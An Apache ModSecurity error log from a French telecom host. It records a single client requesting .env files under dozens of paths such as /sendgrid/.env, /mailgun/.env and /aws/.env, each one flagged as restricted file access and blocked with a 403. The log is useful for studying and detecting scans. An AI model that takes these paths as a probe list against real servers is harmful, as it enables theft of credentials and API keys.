[Mon May 11 17:23:02.189566 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0gAAAAI"]
[Mon May 11 17:23:02.343629 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0wAAAAI"]
[Mon May 11 17:23:02.344128 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0wAAAAI"]
[Mon May 11 17:23:02.344384 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0wAAAAI"]
[Mon May 11 17:23:02.498311 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1AAAAAI"]
[Mon May 11 17:23:02.498789 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1AAAAAI"]
[Mon May 11 17:23:02.499010 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1AAAAAI"]
[Mon May 11 17:23:02.652986 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1QAAAAI"]
[Mon May 11 17:23:02.653500 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1QAAAAI"]
[Mon May 11 17:23:02.653747 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1QAAAAI"]
[Mon May 11 17:23:02.812274 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1gAAAAI"]
[Mon May 11 17:23:02.812744 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1gAAAAI"]
[Mon May 11 17:23:02.812971 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN1gAAAAI"]
[Mon May 11 17:23:02.967093 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN2AAAAAI"]
[Mon May 11 17:23:02.967631 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN2AAAAAI"]
[Mon May 11 17:23:02.967889 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN2AAAAAI"]
[Mon May 11 17:23:03.122894 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2QAAAAI"]
[Mon May 11 17:23:03.123397 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2QAAAAI"]
[Mon May 11 17:23:03.123644 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2QAAAAI"]
[Mon May 11 17:23:03.278051 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2gAAAAI"]
[Mon May 11 17:23:03.278561 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2gAAAAI"]
[Mon May 11 17:23:03.278799 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2gAAAAI"]
[Mon May 11 17:23:03.435639 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2wAAAAI"]
[Mon May 11 17:23:03.436109 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2wAAAAI"]
[Mon May 11 17:23:03.436360 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN2wAAAAI"]
[Mon May 11 17:23:03.592002 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3AAAAAI"]
[Mon May 11 17:23:03.592523 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3AAAAAI"]
[Mon May 11 17:23:03.592772 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3AAAAAI"]
[Mon May 11 17:23:03.747659 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3QAAAAI"]
[Mon May 11 17:23:03.748132 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3QAAAAI"]
[Mon May 11 17:23:03.748368 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3QAAAAI"]
[Mon May 11 17:23:03.904068 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3gAAAAI"]
[Mon May 11 17:23:03.904550 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3gAAAAI"]
[Mon May 11 17:23:03.904805 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agH0Vw-Qm4vhlWBPlMjN3gAAAAI"]
[Mon May 11 17:23:04.059468 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN3wAAAAI"]
[Mon May 11 17:23:04.059973 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN3wAAAAI"]
[Mon May 11 17:23:04.060259 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN3wAAAAI"]
[Mon May 11 17:23:04.214908 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4AAAAAI"]
[Mon May 11 17:23:04.215389 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agH0WA-Qm4vhlWBPlMjN4AAAAAI"]
